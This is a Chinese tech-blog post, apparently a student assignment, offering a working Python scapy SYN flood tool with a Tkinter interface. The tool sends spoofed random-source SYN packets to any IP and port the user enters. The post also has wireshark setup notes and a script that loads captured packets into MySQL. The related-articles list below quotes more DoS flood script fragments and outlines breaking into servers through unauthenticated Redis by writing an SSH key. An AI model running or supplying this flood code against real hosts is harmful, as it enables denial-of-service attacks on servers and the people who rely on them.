python可以攻击服务器吗_使用Python scapy实现syn flood攻击 - Python - 服务器之家

最新推荐文章于 2024-07-09 22:07:35 发布
最新推荐文章于 2024-07-09 22:07:35 发布
阅读量256 收藏
点赞数
文章标签: python可以攻击服务器吗

scapy是一个强大的交互式(interactive)的包操作程序,用python写的,有一个python的命令行解释器界面,可直接运行,也也可以作为第三库,在python程序中import来使用它的类和方法。支持对广泛的网络协议解码和生成,进行数据包发送、捕获、请求匹配应答等,可以用来生成指定内容的网络数据包的工具

官方文档:http://www.secdev.org/projects/scapy/doc/

关于wireshark:

我们需要一个抓包工具,wireshark是一个运用广泛的抓包分析工具,前身是Ethereal

发现一份翻译的着实不太好不过还是非常感谢辛勤劳动的中文文档:

http://man.lupaworld.com/content/network/wireshark/index.html

yum install

wireshark

命令行输入wireshark,提示没有找到

bash: cd: /usr/lib/wireshark: No such file or directory

解决它:

yum search wireshark

提示:

Loaded plugins: langpacks, presto, refresh-packagekit

updates/pkgtags | 333 B 00:00

============================ N/S Matched: wireshark ============================

wireshark-devel.i686 : Development headers and libraries for wireshark

wireshark-devel.x86_64 : Development headers and libraries for wireshark

wireshark-gnome.x86_64 : Gnome desktop integration for wireshark

wireshark.i686 : Network traffic analyzer

wireshark.x86_64 : Network traffic analyzer

Name and summary matches only, use "search all" for everything.

选择gnome的即可

yum install wireshark-gnome.x86_64

方便又好用的wireshark,实在是童叟无欺啊

关于Tkinter:

python下gui编程有很多,随便挑了一个,比较简单的Tkinter

随便找了一份入门文档:http://www.programup.com/wiki/beginning_tkinter/ 随便看看就ok了,- -|| 汗

表示各种控件要自己写代码,比起c#、mfc、swt之流着实不太习惯,感觉给它们定位是个问题

Tkinter有三个布局管理器

Pack,Grid,Place

感觉不是太好用,随便挑了一个grid应付应付(ToT)/~~~

关于写数据库:

老师要求非要写数据库,表示作为攻击方的实在没道理攻击一下写一次数据库的,干坏事不能留痕迹,那么作为被攻击方的就勉强收集一下数据好了

又不知道怎么直接从wireshark里面写到mysql里面去,它倒是提供了Export,导成plain

text实在看着头大,正好有xml,这个还好处理一点,只好人工导出成xml,来读xml,再写到mysql,偷懒用正则表达式直接匹配它的标签

写mysql,一定不能忘了一句commit(),没了这一句,明明写成功了,数据库里面怎么都看不到数据o((⊙﹏⊙))o.

顺便附录一句如何查看mysql文件存放的路径:

mysql> show variables like '%datadir%';

+---------------+-----------------+

| Variable_name | Value |

+---------------+-----------------+

| datadir | /var/lib/mysql/ |

+---------------+-----------------+

1 row in set (0.00 sec)

再顺便表扬一句mysql太乖了,跟它说quit,它会说Bye,v( ̄︶ ̄)y

—————————我是展示成果分割线——————————

syn攻击方代码

用网卡设置为本地,要在root权限下运行,否则发送tcp连接会报错- -||

#coding=utf-8

import socket, sys, random, threading

from scapy.all import *

from Tkinter import *

scapy.config.conf.iface = 'lo'

target = ''

port = 0

count = 0

class sendSYN(threading.Thread):

global target, port

def __init__(self):

threading.Thread.__init__(self)

def run(self):

isrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))

isport = random.randint(1,65535)

ip = IP(src = isrc,dst = target)

syn = TCP(sport = isport, dport = port, flags = 'S')

send(ip / syn, verbose = 0)

def click_button():

global target, port, count

target = e1.get()

port = int(e2.get())

count = int(e3.get())

i = 0

while i < count:

i += 1

sendSYN().start()

class App:

def __init__(self, master):

frame = Frame(master)

frame.pack()

label1 = Label(frame, text="IP地址:", width = 10, height = 3)

label1.grid(row = 0, column = 0)

label2 = Label(frame, text="端口号:", width = 10, height = 3)

label2.grid(row = 1, column = 0)

label3 = Label(frame, text="攻击次数:", width = 10, height = 3)

label3.grid(row = 2, column = 0)

global e1, e2, e3

entry1 = Entry(frame, textvariable=e1, width = 15)

entry1.grid(row = 0, column = 1)

entry2 = Entry(frame, textvariable=e2, width = 15)

entry2.grid(row = 1, column = 1)

entry3 = Entry(frame, textvariable=e3, width = 15)

entry3.grid(row = 2, column = 1)

button1 = Button(frame, text='设定', command = click_button)

button1.grid(row = 3, column = 1)

button2 = Button(frame, text='退出', command = frame.quit)

button2.grid(row = 3, column = 2)

root = Tk()

e1 = StringVar();

e2 = StringVar();

e3 = StringVar();

root.title('syn flood')

root.geometry('300x190')

app = App(root)

root.mainloop()

效果:

有点难看( >﹏<。)~

09514Ab3-0.png

记得打开wireshark等着看

0951463609-1.png

发一下看看v( ̄︶ ̄)y

09514B506-2.png

嗖的一下就有东西了

0951464638-3.png

给的信息十分全面^_^

0951461O0-4.png

处理这个xml文件就好了

0951462154-5.png

处理xml写数据库的代码,记得把数据库打开- -||

import re

import MySQLdb as mdb

con = mdb.connect(host = 'localhost', user = 'root', passwd = '')

cursor = con.cursor()

cursor.execute('create database if not exists dbforsyn')

con.select_db('dbforsyn')

cursor.execute('create table if not exists packet(id int KEY, Time float, Source varchar(100), Destination varchar(100), Protocol varchar(20), Length int, Info varchar(100))')

myfile = open('2.xml')

s = myfile.read()

myfile.close()

s = s.replace('>', '>')

a = re.findall(r'.*', s)

ct = 0

mylist = []

flag = 0

for i in a:

ct += 1

if (ct == 1 or ct == 6) and flag == 1:

mylist.append(int(i[9:-10]))

elif ct == 2 and flag == 1:

mylist.append(float(i[9:-10]))

else:

mylist.append(i[9:-10])

if ct % 7 == 0:

if flag == 0:

flag = 1

else:

n = cursor.execute('insert into packet values(%s, %s, %s, %s, %s, %s, %s)', mylist)

mylist = []

ct = 0

con.commit()

cursor.close()

09514B3G-6.png

就这么着吧……<(* ̄▽ ̄*)/

weixin_39628864
关注
chatgpt赋能pythonPython能入侵服务器吗?
laingziwei的博客
06-26 205
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
python实现dns劫持_通过python的dnspython模块实现DNS流量攻击
weixin_39604350的博客
12-15 464
一、我是个菜B,慢慢摸索学习中。安装模块 pip install dnspython使用python调用dnspython模块,写了一个dns攻击的小程序,目标IP为自己搭建的DNS服务器,并且可以获取DNS的标志位返回值,其中还可以使用程序查看返回值,其实没卵用。相关的DNS的报文格式大概如下:(1)公共报文头格式其中header报文头是必须有的,其他的有没有在报文头里有定义:标识ID: 请...
python攻击服务器_基于ShodanPython库的批量攻击实践
weixin_40001519的博客
12-18 379
拜读了xiaix关于Shodan的全面介绍:《Shodan新手入坑指南》,受益匪浅。SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。希望能给有类似需求的同学提供参考。0x01 基本思路首先利用Shodan的Python库获取并实时处理MSSQL服务器IP及1434端口B...
python scapy实现泛洪(flood)攻击
最新发布
2301_80419020的博客
07-09 295
python scapy泛洪攻击
python怎么攻击服务器_[宜配屋]听图阁
weixin_34636056的博客
02-04 200
# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randintclass Loop(Thread):def __init__(self,remoteAddr):Thread.__init__(self)self.remoteAddr = ...
python可以攻击服务器吗_用python进行服务器的监控
weixin_39952800的博客
11-24 298
python进行服务器的监控在linux服务器中,一切皆为文件,就是说,服务器运行的个中信息,其实是可以从某些文件中查询得到的;百度后,你会知道,在Linux系统中,有一个/proc的虚拟文件系统:Linux 系统为管理员提供了非常好的方法,使其可以在系统运行时更改内核,而不需要重新引导内核系统,这是通过/proc 虚拟文件系统实现的。/proc 文件虚拟系统是一种内核和内核模块用来向进程(pr...
syn 攻击脚本 python_Python Scapy实现SYN Flood攻击
weixin_35266799的博客
01-30 1355
SYN Floodpython实现代码如下。需要事先安装scapy库。(是scapy 不是scrapy)from scapy.all import *import randomfrom scapy.layers.inet import TCP, IPimport socket,threadingdst=""dport=0class flood_SYN(threading.Thread):glob...
Python项目 基于Scapy实现SYN泛洪攻击的方法
09-19
使用Scapy实现SYN泛洪攻击,首先确保已安装Scapy3k库,可以使用以下命令安装: ``` sudo pip3 install scapy-python3 ``` 接下来,我们使用Scapy构造并发送SYN数据包。以下是一个简单的示例: ```python import ...
scapy模拟攻击_Python Scapy实现SYN Flood攻击
weixin_39602615的博客
12-30 665
SYN Floodpython实现代码如下。需要事先安装scapy库。(是scapy 不是scrapy)from scapy.all import *import randomfrom scapy.layers.inet import TCP, IPimport socket,threadingdst=""dport=0class flood_SYN(threading.Thread):glob...
syn 攻击脚本 python_Scapy实现SYN泛洪攻击
weixin_39705065的博客
11-29 561
一、实验说明1.实验介绍本次实验将使用python3版本的Scapy--Scapy3k来实现一个简单的DDos,本次实验分为两节,本节将学习如何使用Scapy3k来实现SYN泛洪攻击。2.知识点SYN泛洪攻击实现原理Scapy3k的基本用法3.效果图二、基础知识以下部分内容整理自百度百科、360百科和Scapy3k官方文档:1.SYN泛洪攻击SYN泛洪攻击(SYN Flood)是一种比较常用的D...
python可以攻击服务器吗_[代码全屏查看]-python对机器的网页服务器进行拒绝服务攻击...
weixin_39524741的博客
11-24 46
[1].[文件]httpFlood.py ~ 1KB 下载(34)# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randintclass Loop(Thread):def __init__(self,remoteAddr):Thr...
分析python服务器拒绝服务攻击代码
12-24
复制代码 代码如下:# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randint class Loop(Thread):    def __init__(self,remoteAddr):        Thread.__init__(self)        self.remoteAddr = remoteAddr     def run(self):        ip = str(randint(0,255))+’.’\   
python服务器拒绝服务器攻击
weixin_33881041的博客
03-16 392
# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randintclass Loop(Thread): def __init__(self,remoteAddr): Threa...
Python黑帽子编程—Scapy实现SYN泛洪攻击(SYN Flood)
CSN-001的博客
11-29 2595
Scapy实现SYN泛洪攻击 1、原理介绍 SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。 我们都知道建立TCP连接需要完成三次握手。正常情况下客户端首先向服务端发送SYN报文,随后服务端回以SYN+ACK报文到达客户端,最后客户端向服务端发送ACK报文完成三次握手。 而SYN泛洪攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文。由于服务器在处理TCP请求时,会在协议
Scapy实现SYN泛洪攻击
weixin_34005042的博客
03-03 897
一、实验说明 1.实验介绍 本次实验将使用python3版本的Scapy--Scapy3k来实现一个简单的DDos,本次实验分为两节,本节将学习如何使用Scapy3k来实现SYN泛洪攻击。 2.知识点 SYN泛洪攻击实现原理 Scapy3k的基本用法 3.效果图 二、基础知识 以下部分内容整理自百度百科、360百科和Scapy3k官方文档: SYN Flood SYN 泛洪攻击 Scap...
python怎么攻击服务器_分析python服务器拒绝服务攻击代码
weixin_42666036的博客
02-04 272
# -*- coding: cp936 -*-from scapy.all import *from threading import thread,activecountfrom random import randintclass loop(thread):def __init__(self,remoteaddr):thread.__init__(self)self.remoteaddr = ...
python可以攻击服务器吗_分析python服务器拒绝服务攻击代码
weixin_39917485的博客
11-24 60
# -*- coding: cp936 -*-from scapy.all import *from threading import Thread,activeCountfrom random import randintclass Loop(Thread):def __init__(self,remoteAddr):Thread.__init__(self)self.remoteAddr = ...
python 入侵服务器_一个入侵iis服务器的简单案例
weixin_39641173的博客
12-16 666
黑客入侵一台服务器的大体分为以下几个步骤:下面列举一个入侵iis的简单案例:1.伪装:由于是学习案例,在此不进行代理或者VPN伪装。2.踩点:指定一个含有漏洞的网站的网页。3.分析:对于网站的攻击首先想到的方法是sql注入。4.入侵:使用domain3.6旁注工具进行sql注入攻击。(获取到网站管理员的用户名和密码)5.提权:以网站管理员身份登陆网页,上传webshell。(如格式不正确则更改格式...
python如何入侵服务器的_通过redis入侵服务器的步骤
weixin_42524276的博客
01-12 572
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。一,生成本地ssh公钥ssh-keygen二,先连接redis看看telnet 192.168.15.10 6379redis-cli -h 192.168.15.10三, 清一下re...
python语言实现网络嗅探中检测syn flood攻击
06-08
可以使用 PythonScapy实现网络嗅探,并检测 SYN Flood 攻击。具体实现步骤如下: 1. 导入 Scapy 库 ```python from scapy.all import * ``` 2. 监听网络数据包,并过滤出 TCP 协议的数据包 ```python def...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值